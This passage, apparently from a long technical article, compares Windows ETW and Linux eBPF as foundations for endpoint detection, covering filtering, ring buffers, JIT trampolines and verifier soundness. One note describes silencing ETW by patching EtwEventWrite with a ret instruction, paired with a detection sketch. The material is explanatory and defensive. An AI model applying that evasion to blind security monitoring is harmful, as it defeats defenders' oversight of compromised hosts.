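KW_PROCESS, KW_THREAD, KW_IMAGE = 0x10, 0x20, 0x40


def session_enabled(ev: dict, session_level: int, match_any: int) -> bool:
    """Simplified enablement: level ceiling plus MatchAnyKeyword intersection."""
    return ev["level"] <= session_level and (ev["keyword"] & match_any) != 0


events = (
    [{"level": INFO, "keyword": KW_PROCESS, "image": "cmd.exe"}] * 900
    + [{"level": INFO, "keyword": KW_PROCESS, "image": "evil.exe"}] * 10
    + [{"level": VERBOSE, "keyword": KW_THREAD, "image": "svchost.exe"}] * 5000
    + [{"level": INFO, "keyword": KW_IMAGE, "image": "ntdll.dll"}] * 3000
)

# Session: Informational level, process keyword only.
crossed = [e for e in events if session_enabled(e, INFO, KW_PROCESS)]

# User-mode consumer filter, applied only after the crossing.
kept = [e for e in crossed if e["image"] == "evil.exe"]

print(len(events), len(crossed), len(kept))  # 8910 910 10
```

The mask removed the thread and image-load noise, but 900 of the 910 events that crossed were still discarded in user mode. That residue is the cost an in-kernel programmable filter would eliminate.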

The Threat-Intelligence provider

ETW providers are not equal. The most architecturally important one for security is Microsoft-Windows-Threat-Intelligence, a kernel-only provider that emits signals only the kernel can see: image loads, remote-thread creations, VirtualProtect changes that flip memory from data to executable. Only a process running under Protected Process Light with the AntiMalware signer [@learn-microsoft-com-downloads-sysmon] can subscribe. That is why Defender, CrowdStrike Falcon, SentinelOne, and Carbon Black [@github-com-providers-docs] all run as PPL-Antimalware: it is the entry ticket to the kernel-only telemetry that distinguishes serious EDR from script-level monitoring.

Note: ETW's biggest weakness is that user-mode providers run inside the very process they are observing. A process can patch its own copy of ntdll!EtwEventWrite with a ret instruction and silence its own user-mode emissions before they reach the kernel buffer. EDR vendors monitor for this integrity violation out of band, treating the patch itself as a high-confidence detection signal. The very existence of the tell is an admission that ETW's original design assumed an honest user-mode producer -- a reasonable assumption in 2000, increasingly untenable in 2025.
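The out-of-band check can be sketched as a byte comparison between a function's entry bytes on disk and the copy loaded in memory. The buffers below are hypothetical stand-ins: the sketch does not read real process memory, and the prologue bytes are illustrative rather than the actual EtwEventWrite prologue of any ntdll build. `0xC3` is the x86-64 `ret` opcode.

```python
RET = 0xC3  # x86-64 near-return opcode

# Illustrative entry bytes only (mov r11, rsp; sub rsp, 0x58).
ON_DISK = bytes.fromhex("4c8bdc4883ec58")


def classify(on_disk: bytes, in_memory: bytes) -> str:
    """Compare a function's entry bytes on disk against the loaded copy."""
    if on_disk == in_memory:
        return "clean"
    if in_memory[:1] == bytes([RET]):
        return "ret-patched"  # entry returns immediately: emissions silenced
    return "modified"  # some other hook or patch; still worth an alert


print(classify(ON_DISK, ON_DISK))                           # clean
print(classify(ON_DISK, bytes([RET]) + ON_DISK[1:]))        # ret-patched
print(classify(ON_DISK, bytes.fromhex("e9000000004883")))   # modified
```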

Sysmon 6.20 [@learn-microsoft-com-downloads-sysmon], released in 2018, was the version that tied ETW into the modern EDR stack as a turnkey configuration. (The 2018 Sysmon 6.20 release added the configuration schema that the cybersecurity community converged on. By 2026, the same XML configuration -- including the ProcessCreate, NetworkConnect, ImageLoad, and FileCreate event IDs -- works on both Sysmon for Windows and Sysmon for Linux.) Sysmon, Microsoft's own free reference consumer authored by Mark Russinovich and Thomas Garnier [@learn-microsoft-com-downloads-sysmon], demonstrated that an XML configuration plus an ETW consumer plus protected-process status was enough to build a useful EDR. Sysmon is not Defender; it is the open shape that the commercial EDR vendors built proprietary versions of.

Closing on ETW

ETW emits. Every enabled event crosses the kernel-user boundary, fully formatted, with no in-kernel filtering language whatsoever. The session's level and keyword mask is a coarse on/off switch, not a programmable filter. Aggregation, sampling, and stack-trace folding happen in user mode, after the event is already across the boundary.

Now you can read the question that drove Starovoitov's 2014 rewrite: what if you could filter in the kernel itself? What if you could compute -- not just emit?

4. eBPF: Programmable In-Kernel Computation

The architectural inversion is one sentence. ETW is the producer telling the consumer what happened. eBPF is the consumer telling the producer what to compute. The producer is the kernel; the consumer is a user-mode process that has compiled, verified, and attached a small program that will run inside the kernel at a chosen hook. The roles are inverted, the data flow is inverted, and the trust model is inverted.

The lifecycle

A canonical eBPF program goes through six stages before it does any useful work. The basic flow has held since Linux 3.18, with refinements added over the years for BTF (BPF Type Format), CO-RE (Compile Once, Run Everywhere), and link primitives such as BPF_LINK_CREATE:

1. clang -target bpf -O2 -g -c prog.c -o prog.o         # ELF with BTF (-g emits it)
2. for each map referenced:
       map_fd = bpf(BPF_MAP_CREATE, &attr)              # maps exist before the program
3. fd = bpf(BPF_PROG_LOAD, &attr)                       # map fds patched in; verifier runs
4. link = bpf(BPF_LINK_CREATE, kprobe|tracepoint|xdp|lsm|cgroup, fd)
5. at hook fire: JIT-compiled native code runs on the
   producing CPU, reads context, calls bpf_* helpers,
   writes to map or ringbuf
6. user space mmaps the ringbuf and consumes records

The lifecycle is documented in the canonical kernel BPF documentation index [@kernel-org-bpf-indexhtml]. It is worth lingering on stage 3. Between the user-space bpf() syscall and the moment the kernel hands back a file descriptor for the loaded program, a static analyzer runs. That analyzer is the most consequential piece of code in this entire article. We treat it on its own in section 5.
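To see in miniature what "a static analyzer runs before the file descriptor comes back" means, here is a toy pre-load check in the spirit of classic BPF's rules. Every jump must go forward and land inside the program, and the last instruction must be an exit. The `(op, arg)` instruction tuples are hypothetical. The real Linux verifier goes much further: it tracks register types and value ranges along every path and has accepted bounded loops since Linux 5.3.

```python
# Hypothetical instruction form: (op, arg). "ja" = unconditional jump by arg,
# "jeq" = conditional jump by arg; every other op falls through.
def verify(prog):
    """Return (ok, reason). Reject back-edges, out-of-range jumps,
    and programs whose final instruction is not an exit."""
    if not prog:
        return False, "empty program"
    for pc, (op, arg) in enumerate(prog):
        if op in ("ja", "jeq"):
            if arg < 0:
                return False, f"back-edge at insn {pc}"
            if pc + 1 + arg >= len(prog):
                return False, f"jump out of range at insn {pc}"
    if prog[-1][0] != "exit":
        return False, "last insn is not exit"
    return True, "ok"


print(verify([("mov", 0), ("exit", 0)]))               # (True, 'ok')
print(verify([("mov", 0), ("ja", -2), ("exit", 0)]))   # (False, 'back-edge at insn 1')
print(verify([("jeq", 5), ("exit", 0)]))               # (False, 'jump out of range at insn 0')
```

A program that fails any check never gets a file descriptor, so it never reaches the JIT or a hook.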

flowchart TD
  A["Restricted C source -- (prog.c)"]
  B["clang -target bpf -g -- BPF ELF + BTF"]
  G[bpf BPF_MAP_CREATE]
  H["BPF maps -- (arrays, hashes, ringbuf)"]
  C[bpf BPF_PROG_LOAD]
  D[Kernel verifier]
  Z["Load fails -- errno + verifier log"]
  E[JIT compiler]
  I["bpf BPF_LINK_CREATE -- (kprobe/xdp/lsm/...)"]
  F[Kernel hook]
  J[Hook fires]
  K[User space mmap ringbuf]
  A --> B --> G --> H
  B --> C --> D
  H -. map fds .-> C
  D -->|reject| Z
  D -->|accept| E --> I --> F
  F --> J --> H
  H --> K

Hooks: where programs attach

The thing that distinguishes eBPF from a packet filter is its hook surface. A hook is a place inside the kernel where a verified program can be attached, fired at the moment something happens. Linux has a lot of hooks.

eBPF hook. An attachment point in kernel code where a verified eBPF program runs. Different hook types receive different context arguments: a kprobe receives the function's CPU registers; an XDP program receives a packet buffer; an LSM hook receives the security operation's parameters. The hook type also determines what helpers and map types the verifier allows.

The hook taxonomy, drawn from the kernel BPF docs [@kernel-org-bpf-indexhtml] and Cilium's BPF architecture reference [@docs-cilium-io-bpf-architecture], is broad:

kprobe and kretprobe -- entry and return of any non-inlined kernel function.
fentry and fexit -- BPF trampoline replacement for kprobes, with no int3 trap-frame cost.
uprobe -- any user-space symbol in any process.
tracepoint -- stable kernel tracepoints with version-locked schemas.
perf_event -- sampling-profile hooks tied to perf events.
XDP -- runs in the network driver's receive path, before an sk_buff is allocated.
TC -- Linux traffic-control qdisc hooks.
LSM -- Linux Security Module hooks (mandatory-access-control points), available since Linux 5.7.
cgroup, sched, sock_ops -- policy and socket-state hooks.

flowchart TD
  K["eBPF -- Programs"]
  T["Tracing -- (kprobe, fentry, -- uprobe, tracepoint)"]
  N["Networking -- (XDP, TC, sock_ops, -- sk_lookup)"]
  S["Security -- (LSM, seccomp, -- landlock)"]
  P["Policy & scheduling -- (cgroup, sched, -- perf_event)"]
  K --> T
  K --> N
  K --> S
  K --> P

That hook surface is what makes eBPF the universal Linux instrumentation substrate. Once a developer learns the load-verify-attach lifecycle, the same toolchain instruments a TCP retransmit, a do_sys_open call, an LSM file_open check, and an XDP fast-path drop -- all in the same language with the same verifier and the same JIT.

Maps: in-kernel state

The second piece of architecture eBPF adds over classic BPF is the map -- a kernel-managed key-value store accessible from inside a verified program and from user space. Maps are how eBPF programs hold state between invocations and how they communicate with user space.

BPF map. A kernel-managed data structure that an eBPF program can read and write from inside the kernel, and a user-space process can read and write through the `bpf()` syscall. Common map types include hash, array, LRU hash, per-CPU hash, ring buffer, and program array (used for tail calls). Each map has a maximum capacity declared at creation and a verifier-checked size for keys and values.

The kernel hash-map documentation [@docs-kernel-org-bpf-maphashhtml] distinguishes shared and per-CPU variants. The decision between them is one of the consequential design choices in writing real eBPF code.

Map type	Cross-CPU semantics	Update cost	Memory cost	Best for
`BPF_MAP_TYPE_HASH`	One value per key, shared across CPUs	Atomic `__sync_fetch_and_add` or `BPF_F_LOCK` spinlock	`max_entries * (key_size + value_size)`	State that must be globally consistent
`BPF_MAP_TYPE_PERCPU_HASH`	Separate value slot per CPU	Non-atomic read-modify-write	`max_entries * value_size * num_cpus`	Counters and histograms where rate matters and snapshot consistency does not
`BPF_MAP_TYPE_RINGBUF`	Single MPSC ring with global FIFO order	Reservation-spinlock on producer	Fixed buffer	Event streams whose user-space order must match cross-CPU producer order

The per-CPU variant exists because cache-coherence cost on a contended hash slot dominates the time spent updating it; per-CPU maps remove that contention entirely at the price of cross-CPU consistency. A per-CPU counter on a 96-vCPU host occupies 96 * value_size bytes per key, but updates are local loads and stores. A shared counter on the same host is value_size bytes per key, but every increment is an atomic.
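A minimal user-space sketch of the two counter layouts follows. It assumes a fixed NUM_CPUS of 4 and uses C11 atomics to stand in for the shared map's atomic update; all names are hypothetical, and nothing here touches a real BPF map.

```c
#include <stdatomic.h>
#include <stdint.h>

/* Hypothetical model: NUM_CPUS and both layouts are illustrative,
 * not kernel data structures. */
#define NUM_CPUS 4

/* Shared layout (like BPF_MAP_TYPE_HASH): one value every CPU updates. */
static _Atomic uint64_t shared_counter;

/* Per-CPU layout (like BPF_MAP_TYPE_PERCPU_HASH): one slot per CPU. */
static uint64_t percpu_counter[NUM_CPUS];

/* Every increment is an atomic read-modify-write on one contended cache line. */
static void shared_inc(void) {
    atomic_fetch_add_explicit(&shared_counter, 1, memory_order_relaxed);
}

/* Assumes slot `cpu` is only ever written by code running on that CPU,
 * so a plain (non-atomic) increment is enough. */
static void percpu_inc(unsigned cpu) {
    percpu_counter[cpu] += 1;
}

static uint64_t shared_read(void) {
    return atomic_load_explicit(&shared_counter, memory_order_relaxed);
}

/* Reading the per-CPU layout means summing every slot. While other CPUs
 * keep incrementing, the sum is not a consistent snapshot. */
static uint64_t percpu_read(void) {
    uint64_t total = 0;
    for (unsigned cpu = 0; cpu < NUM_CPUS; cpu++)
        total += percpu_counter[cpu];
    return total;
}
```

The write path is where the layouts differ in cost; the read path is where they differ in consistency. The per-CPU layout moves the summation to the reader, which is the right trade when writes vastly outnumber reads.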

The BPF ring buffer (BPF_MAP_TYPE_RINGBUF) is a multi-producer single-consumer kernel-to-user transport added in Linux 5.8 and documented at `docs.kernel.org/bpf/ringbuf.html` [@docs-kernel-org-bpf-ringbufhtml]. Unlike the legacy `perf_event_array` (one ring per CPU), the BPF ringbuf is a single ring shared across all CPUs, with cross-CPU producer ordering preserved in the user-visible record stream.

The ringbuf documentation [@docs-kernel-org-bpf-ringbufhtml] is explicit about why the design exists: "more efficient memory use by sharing ring buffer across CPUs; preserving ordering of events that happen sequentially in time, even across multiple CPUs (e.g., fork/exec/exit events for a task)." A security telemetry consumer that needs to see fork on CPU 0 before kill on CPU 1 cannot use a per-CPU ring; it needs a single MPSC ring. The trade-off is real: the producer pays a brief spinlock for slot reservation, where a per-CPU ring would pay nothing. For event streams the trade is worth it; for histograms it is not.
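The ordering guarantee comes from reserving slots in a single sequence and letting the consumer stop at the first record that is not yet committed. The toy below sketches that idea in user space, assuming fixed-size records, an 8-slot ring, and a C11 spinlock for reservation; the real BPF ringbuf uses variable-length records and kernel primitives, and every name here is hypothetical.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define RING_SLOTS 8
#define PAYLOAD 32

struct record {
    _Atomic bool busy;              /* set at reserve, cleared at commit */
    char payload[PAYLOAD];
};

struct ring {
    atomic_flag lock;               /* producer reservation spinlock */
    _Atomic uint64_t producer_pos;  /* next slot to hand out */
    _Atomic uint64_t consumer_pos;  /* next slot the consumer reads */
    struct record slots[RING_SLOTS];
};

static void ring_init(struct ring *r) {
    atomic_flag_clear(&r->lock);
    atomic_init(&r->producer_pos, 0);
    atomic_init(&r->consumer_pos, 0);
    for (size_t i = 0; i < RING_SLOTS; i++) {
        atomic_init(&r->slots[i].busy, false);
        memset(r->slots[i].payload, 0, PAYLOAD);
    }
}

/* Producer: hold the spinlock only long enough to claim the next slot.
 * The claimed position fixes the record's place in the consumer's order. */
static struct record *ring_reserve(struct ring *r) {
    struct record *rec = NULL;
    while (atomic_flag_test_and_set_explicit(&r->lock, memory_order_acquire))
        ;                           /* spin */
    uint64_t prod = atomic_load_explicit(&r->producer_pos, memory_order_relaxed);
    uint64_t cons = atomic_load_explicit(&r->consumer_pos, memory_order_acquire);
    if (prod - cons < RING_SLOTS) {
        rec = &r->slots[prod % RING_SLOTS];
        atomic_store_explicit(&rec->busy, true, memory_order_relaxed);
        atomic_store_explicit(&r->producer_pos, prod + 1, memory_order_release);
    }
    atomic_flag_clear_explicit(&r->lock, memory_order_release);
    return rec;                     /* NULL: ring full, event dropped */
}

/* Producer: publish the record after writing its payload (outside the lock). */
static void ring_commit(struct record *rec) {
    atomic_store_explicit(&rec->busy, false, memory_order_release);
}

/* Single consumer: copy committed records in reservation order, stopping at
 * the first record that is still busy so the order is never violated. */
static size_t ring_consume(struct ring *r, char out[][PAYLOAD], size_t max) {
    size_t n = 0;
    uint64_t cons = atomic_load_explicit(&r->consumer_pos, memory_order_relaxed);
    uint64_t prod = atomic_load_explicit(&r->producer_pos, memory_order_acquire);
    while (n < max && cons < prod) {
        struct record *rec = &r->slots[cons % RING_SLOTS];
        if (atomic_load_explicit(&rec->busy, memory_order_acquire))
            break;
        memcpy(out[n++], rec->payload, PAYLOAD);
        cons++;
    }
    atomic_store_explicit(&r->consumer_pos, cons, memory_order_release);
    return n;
}
```

If a "fork" record is reserved first but a "kill" record commits first, the consumer returns nothing until "fork" commits, then delivers both in reservation order. The reservation spinlock is the producer-side cost the text mentions.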

The aggregation pattern

The clearest illustration of why eBPF is strictly more powerful than ETW is a single bpftrace one-liner. bpftrace [@github-com-iovisor-bpftrace], a tracing language explicitly inspired by DTrace, compiles a single-line query into a verified eBPF program:

kprobe:vfs_read { @[comm] = hist(arg2); }

This program attaches to the vfs_read kernel function. For every call, it indexes a per-CPU map by the calling process's name (comm), buckets the arg2 value (the read length) into a power-of-two histogram, and increments the bucket. Nothing crosses the kernel-user boundary while vfs_read is firing -- not at 10K calls per second, not at 10M. When the user hits Ctrl-C, bpftrace iterates the per-CPU maps from user space, merges the buckets across CPUs, and prints a histogram.

ETW cannot do this. To produce the same histogram with ETW, a consumer would have to subscribe to every vfs_read-equivalent kernel event, receive each one in user mode, compute its bucket, and update an in-process histogram. The kernel-user wire would carry the full firehose. eBPF carries only the final histogram.

{`
// The bpftrace one-liner:
//   kprobe:vfs_read { @[comm] = hist(arg2); }
// lowers (conceptually) to this kernel-side and user-side flow.

// --- inside the kernel, at every vfs_read call ---
function on_vfs_read(ctx) {
  const comm = bpf_get_current_comm();
  const len = ctx.regs.rdx;   // arg2 (read length): x86-64 passes the third argument in rdx
  const bucket = log2(len);   // 0..63

  // per-CPU hash keyed by (comm, bucket); no cross-CPU atomics.
  const key = comm + ":" + bucket;
  const count = percpu_map.lookup(key) || 0;
  percpu_map.update(key, count + 1);   // touches only this CPU's slot
}

// --- in user space, on Ctrl-C ---
function print_histogram() {
  const merged = {};
  for (const cpu of all_cpus) {
    for (const [key, count] of percpu_map.iter(cpu)) {
      merged[key] = (merged[key] || 0) + count;
    }
  }
  render_power_of_two_histogram(merged);
}
`}

The kernel-side per-event cost is a few instructions plus a non-atomic increment. The user-space cost is paid once, at print time. The wire between kernel and user carries one batch read of the entire per-CPU map. ETW's equivalent would carry every single vfs_read event in full.
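The same two halves can be sketched in plain C. This is a simplification under stated assumptions: a hypothetical NUM_CPUS of 4, the comm key dropped for brevity, and a floor(log2) bucketing rule that is illustrative rather than bpftrace's exact bucket layout.

```c
#include <stdint.h>

#define NUM_CPUS 4      /* hypothetical CPU count */
#define NUM_BUCKETS 64

/* Power-of-two bucket: floor(log2(len)), with len 0 and 1 sharing bucket 0. */
static unsigned pow2_bucket(uint64_t len) {
    unsigned b = 0;
    while (len > 1) {
        len >>= 1;
        b++;
    }
    return b;
}

/* "Kernel" side, per event: a plain increment in this CPU's own histogram. */
static uint64_t percpu_hist[NUM_CPUS][NUM_BUCKETS];

static void on_read(unsigned cpu, uint64_t len) {
    percpu_hist[cpu][pow2_bucket(len)]++;
}

/* User side, once at print time: merge the per-CPU histograms. */
static void merge_hist(uint64_t merged[NUM_BUCKETS]) {
    for (unsigned b = 0; b < NUM_BUCKETS; b++) {
        merged[b] = 0;
        for (unsigned cpu = 0; cpu < NUM_CPUS; cpu++)
            merged[b] += percpu_hist[cpu][b];
    }
}
```

Reads of 4096 bytes on CPU 0 and 5000 bytes on CPU 1 both land in bucket 12, and only the merge step sees them together.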

The instruction-count and complexity limits

Two distinct limits constrain what the verifier will accept. The constants are easy to confuse, and earlier drafts of this article confused them. The correct distinction comes straight from the kernel headers.

BPF_MAXINSNS is defined as 4096 in include/uapi/linux/bpf_common.h. This is the maximum number of bytecode instructions per program for unprivileged callers. A program longer than 4096 instructions is rejected at load time regardless of what the verifier finds.

BPF_COMPLEXITY_LIMIT_INSNS is defined as 1,000,000 in include/linux/bpf.h and enforced in kernel/bpf/verifier.c. It plays two roles. For privileged callers (CAP_BPF or CAP_SYS_ADMIN) it replaces 4096 as the maximum program length. It is also the verifier's processing budget: every instruction the verifier simulates, on every path it explores, counts against it, and verification that processes more than one million instructions fails.

The two limits answer different questions. BPF_MAXINSNS = 4096 bounds the size of an unprivileged program. BPF_COMPLEXITY_LIMIT_INSNS = 1,000,000 bounds the size of a privileged program and, separately, the cost of verifying any program. Conflating them is a common error: production EDRs run with CAP_BPF plus CAP_PERFMON or root and load programs much longer than 4096 instructions, but the verifier's exploration is still bounded.
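A minimal sketch of how the two constants gate a load, modeled on the kernel's logic rather than copied from it; the `privileged` flag stands in for the kernel's capability check, and the function names are hypothetical.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>

#define BPF_MAXINSNS 4096
#define BPF_COMPLEXITY_LIMIT_INSNS 1000000

/* Load-time length gate: the cap depends on privilege, and the check runs
 * before the verifier ever looks at the program. */
static int check_prog_len(uint32_t insn_cnt, bool privileged) {
    uint32_t max = privileged ? BPF_COMPLEXITY_LIMIT_INSNS : BPF_MAXINSNS;
    if (insn_cnt == 0 || insn_cnt > max)
        return -E2BIG;
    return 0;
}

/* Verification budget: charged once per simulated instruction, summed over
 * every explored path, regardless of how long the program is. */
static int charge_verifier(uint64_t *insn_processed) {
    if (++*insn_processed > BPF_COMPLEXITY_LIMIT_INSNS)
        return -E2BIG;
    return 0;
}
```

A 10,000-instruction program passes the length gate only for a privileged caller, yet even a short program with many branches can exhaust the second budget.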

Linux 5.16 (January 2022) [@kernel-org-bpf-indexhtml] made kernel.unprivileged_bpf_disabled=2 the default by turning on CONFIG_BPF_UNPRIV_DEFAULT_OFF: unprivileged bpf() is disabled at boot, and an administrator can re-enable it. The change followed a series of verifier soundness CVEs, including CVE-2020-8835 and CVE-2021-3490, that were exploitable from unprivileged user space. Production EDRs run with CAP_BPF plus CAP_PERFMON or full root; the unprivileged path is reserved for sandboxed workloads where the kernel team has weighed the risk.
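The kernel.unprivileged_bpf_disabled sysctl takes three values: 0 (unprivileged bpf() allowed), 1 (disabled, and locked until reboot), and 2 (disabled, but an administrator may set it back to 0). A small hypothetical model of those semantics, deliberately coarse (with value 0, the kernel still restricts unprivileged callers to certain program types):

```c
#include <stdbool.h>

/* Hypothetical model of kernel.unprivileged_bpf_disabled.
 * Callers with CAP_BPF (or CAP_SYS_ADMIN) are not subject to this sysctl. */
static bool bpf_load_allowed(int sysctl_value, bool has_cap_bpf) {
    if (has_cap_bpf)
        return true;
    return sysctl_value == 0;   /* 1 and 2 both refuse unprivileged callers */
}

/* Value 1 is sticky: it cannot be cleared without a reboot. */
static bool admin_can_reenable(int sysctl_value) {
    return sysctl_value != 1;
}
```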

The JIT and the trampoline

Brendan Gregg's BPF Performance Tools [@brendangregg-com-tools-bookhtml], published by Addison-Wesley in 2019 (ISBN-13 9780136554820 [@pearson-com-p200000007897-9780136554820]), reports a 10x to 12x speedup of the JIT over the interpreter on x86-64. The figure is workload-dependent -- the workload, the kernel version, and the program shape all matter -- but an order-of-magnitude gain is the consistent finding across kernel docs and measurements. The JIT is what makes eBPF practically usable inside hot kernel paths.

A second performance refinement landed in 2019 with the BPF trampoline patch series. Starovoitov's v1 cover letter [@lore-kernel-org-1-astkernelorg] introduced fentry and fexit -- BPF program attach points that use a tiny JIT-emitted dispatcher to call the attached programs directly, rather than relying on kprobe's int3 trap mechanism. The framing is worth quoting:

Unlike k[ret]probe there is practically zero overhead to call a set of BPF programs before or after kernel function. -- Alexei Starovoitov, BPF trampoline cover letter [@lore-kernel-org-1-astkernelorg]

The v3 patch in the same series [@lore-kernel-org-4-astkernelorg] explains the structural reason: "To avoid the high cost of retpoline the attached BPF programs are called directly." The kprobe path invokes each attached BPF program through an indirect call, which on Spectre-mitigated kernels pays a retpoline penalty per call. The BPF trampoline replaces that indirect call with a direct call patched in at attach time, eliminating the penalty entirely. The qualitative result is "practically zero overhead" relative to the function call itself. The exact numbers vary; the architectural reason does not.

Tail calls

bpf_tail_call(ctx, &prog_array, index) is a helper that, when the prog_array slot at index holds a loaded program, jumps into that program: the target reuses the caller's stack frame, receives the same ctx, and never returns to the caller. If the index is out of range or the slot is empty, the helper fails and the caller continues with its next instruction. The architecture is documented in the Cilium BPF architecture reference [@docs-cilium-io-bpf-architecture], which describes the 33-call nesting ceiling: "This, too, comes with an upper nesting limit of 33 calls, and is usually used to decouple parts of the program logic, for example, into stages." The 33-call cap bounds the worst-case execution time of a chain that the verifier cannot symbolically follow (the destination is a runtime-resolved map slot, not a static call target). We will return to the security implications of tail calls in section 7.
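A loose user-space model of the chain and its cap follows. Assumptions: a "program" is a C function that returns the prog_array index it wants to tail-call into (or -1 to finish), the array has a hypothetical 4 slots, and a failed tail call simply ends the run instead of resuming the caller's remaining code.

```c
#include <stddef.h>

#define MAX_TAIL_CALL_CNT 33
#define PROG_ARRAY_SIZE 4

typedef int (*bpf_prog_fn)(void *ctx);

/* Example program: always asks to tail-call slot 0. */
static int prog_self_loop(void *ctx) { (void)ctx; return 0; }

/* Example program: finishes without a tail call. */
static int prog_done(void *ctx) { (void)ctx; return -1; }

/* Runs `entry`, then follows tail calls; returns how many succeeded. */
static int run_with_tail_calls(bpf_prog_fn entry,
                               bpf_prog_fn const prog_array[PROG_ARRAY_SIZE],
                               void *ctx) {
    int tail_call_cnt = 0;   /* per-execution counter, shared by the whole chain */
    int taken = 0;
    bpf_prog_fn cur = entry;
    for (;;) {
        int idx = cur(ctx);                      /* requested slot, or -1 */
        if (idx < 0 || idx >= PROG_ARRAY_SIZE)
            break;                               /* out of range: helper fails */
        if (tail_call_cnt >= MAX_TAIL_CALL_CNT)
            break;                               /* nesting limit reached */
        tail_call_cnt++;
        if (prog_array[idx] == NULL)
            break;                               /* empty slot: helper fails */
        cur = prog_array[idx];                   /* jump; caller never resumes */
        taken++;
    }
    return taken;
}
```

A program that tail-calls itself would loop forever without the counter; with it, the chain stops after 33 tail calls, which is what lets the kernel bound the chain's worst case without following it statically.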

Key idea: eBPF inverts the observability model. ETW asks the kernel "what happened?" eBPF asks the kernel "compute this and tell me the answer." The asymmetry is the reason a histogram of vfs_read lengths costs nothing on the wire under eBPF, and costs a fully formatted event per call under ETW.

eBPF is strictly more powerful than ETW: programmable filter, programmable aggregation, hooks everywhere. But that power has a cost that does not exist in ETW at all. The verifier.

5. The Verifier: Where Mathematics Meets the Kernel

May 2023. NIST publishes CVE-2023-2163 [@nvd-nist-gov-2023-2163]. The advisory describes the eBPF verifier in every Linux kernel since 5.4 quietly accepting programs it should have rejected: "Incorrect verifier pruning in BPF in Linux Kernel >=5.4 leads to unsafe code paths being incorrectly marked as safe, resulting in arbitrary read/write in kernel memory, lateral privilege escalation, and container escape." The fix was a small correction to a state-pruning heuristic. The lesson is bigger than the patch: no verifier for a Turing-complete instruction set can be simultaneously sound, complete, and guaranteed to terminate. That is not a bug. It is a theorem.

Rice's theorem in the kernel

Alan Turing proved in 1936 that the halting problem is undecidable: no algorithm can decide, for every possible program, whether that program halts on every input. Henry Gordon Rice extended the result in 1953: any non-trivial semantic property of a program -- including memory safety, type safety, and bounded resource use -- is undecidable for the general case. The verifier has to decide a non-trivial semantic property: does this eBPF program access kernel memory only through valid pointers, with valid offsets, and terminate?

It cannot. Not in general. The verifier has to give up at least one of three properties:

Soundness -- never accept an unsafe program.
Completeness -- never reject a safe program.
Scalability -- run in polynomial time on real programs.

The halting problem is about a single property: termination. Rice's theorem generalizes the result to all non-trivial extensional properties -- any property that depends on what a program computes rather than how it is written. Memory safety on a Turing-complete instruction set is a non-trivial extensional property: there exist programs that are safe and programs that are unsafe. Rice's theorem says no decision procedure can correctly classify every program. Any real verifier must therefore be an *approximation* -- either it sometimes rejects safe programs (loss of completeness), sometimes accepts unsafe ones (loss of soundness), or runs out of resources on hard inputs (loss of scalability).
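Stated formally, as a sketch: let $\varphi_e$ be the partial function computed by program $e$, $\mathcal{PC}$ the set of all partial computable functions, $\mathcal{P}$ a property of those functions, and $V$ a hypothetical verifier that always halts with accept or reject. Treating "safe on every input" as such an extensional property, as the text does, the trilemma follows in three lines:

```latex
\begin{aligned}
&\emptyset \neq \mathcal{P} \subsetneq \mathcal{PC}
  \;\Longrightarrow\;
  L_{\mathcal{P}} = \{\, e \mid \varphi_e \in \mathcal{P} \,\}\ \text{is undecidable,}\\[4pt]
&\text{sound: } V(e) = \text{accept} \Rightarrow e \in L_{\mathcal{P}},
  \qquad
  \text{complete: } e \in L_{\mathcal{P}} \Rightarrow V(e) = \text{accept},\\[4pt]
&V \text{ total, sound, and complete} \;\Longrightarrow\; V \text{ decides } L_{\mathcal{P}}
  \quad \text{(impossible by the first line).}
\end{aligned}
```

Every practical verifier therefore drops one premise: it rejects some safe programs, accepts some unsafe ones, or gives up on resource limits.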

Jia and colleagues at HotOS 2023 [@sigops-org-papers-jiapdf] formalized this trilemma for in-kernel verifiers. The paper's title is the thesis: "Kernel Extension Verification Is Untenable." The authors argue that any verifier for a kernel extension language with the expressiveness of eBPF must trade off at least one of the three properties, and that real verifiers ship by trading all three approximately.

Kernel Extension Verification Is Untenable. -- Jia et al., HotOS 2023, `sigops.org/s/conferences/hotos/2023/papers/jia.pdf` [@sigops-org-papers-jiapdf]

flowchart TD A[Soundness -- never accept -- unsafe programs] B[Completeness -- never reject -- safe programs] C[Scalability -- polynomial time -- on real programs] A --- B B --- C C --- A X["No verifier can have -- all three on a -- Turing-complete ISA"] A -.-> X B -.-> X C -.-> X

The Linux verifier approximates all three. PREVAIL, the verifier used by eBPF-for-Windows, ships with stronger soundness and weaker completeness. The two designs occupy different points on the triangle, and the difference shows up in production.

The Linux verifier

The kernel verifier documentation [@docs-kernel-org-bpf-verifierhtml] describes the algorithm:

"The safety of the eBPF program is determined in two steps. First step does DAG check to disallow loops and other CFG validation. ... Second step starts from the first insn and descends all possible paths. It simulates execution of every insn and observes the state change of registers and stack."

The state the verifier tracks is a register-state lattice. Each register holds a type from a finite set: PTR_TO_CTX (a pointer to the program's context argument), PTR_TO_MAP_VALUE (a pointer into a map entry), PTR_TO_MAP_VALUE_OR_NULL (the return type of bpf_map_lookup_elem, which can be null), SCALAR_VALUE (an integer with min/max range), and so on. Each register also carries min/max bounds, which the verifier recomputes after every arithmetic operation and narrows on every conditional branch.

The eBPF verifier is the kernel-side static analyzer that proves termination and memory safety of every eBPF program before load. The Linux verifier is documented at `docs.kernel.org/bpf/verifier.html` [@docs-kernel-org-bpf-verifierhtml]. It uses a register-state lattice plus min/max range tracking and explores all reachable program paths with state pruning to keep the cost manageable.

Consider the canonical pattern: look up a map value, check for null, dereference. Every eBPF tracing program does some version of this.

struct value *v = bpf_map_lookup_elem(&map, &key);   // r0 := PTR_TO_MAP_VALUE_OR_NULL
if (!v) return 0;                                    // branch on r0 == 0
return v->field;                                     // deref r0 + offset(field)

The verifier traces both branches. On the taken branch (r0 == 0), it marks r0 as a known NULL scalar, and the program returns. On the not-taken branch, the verifier refines the type from PTR_TO_MAP_VALUE_OR_NULL to PTR_TO_MAP_VALUE -- the null qualifier is gone, the dereference is bounds-checked against the map's value size, and the program is accepted.
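The refinement step can be sketched as a tiny abstract interpreter over one register. The type names are borrowed from the kernel for readability, but the logic is a simplification under assumptions: a single register, constant offsets, and no range tracking.

```c
#include <stdbool.h>
#include <stdint.h>

/* Toy subset of the verifier's register types. */
enum reg_type { SCALAR_VALUE, PTR_TO_MAP_VALUE_OR_NULL, PTR_TO_MAP_VALUE };

struct reg_state {
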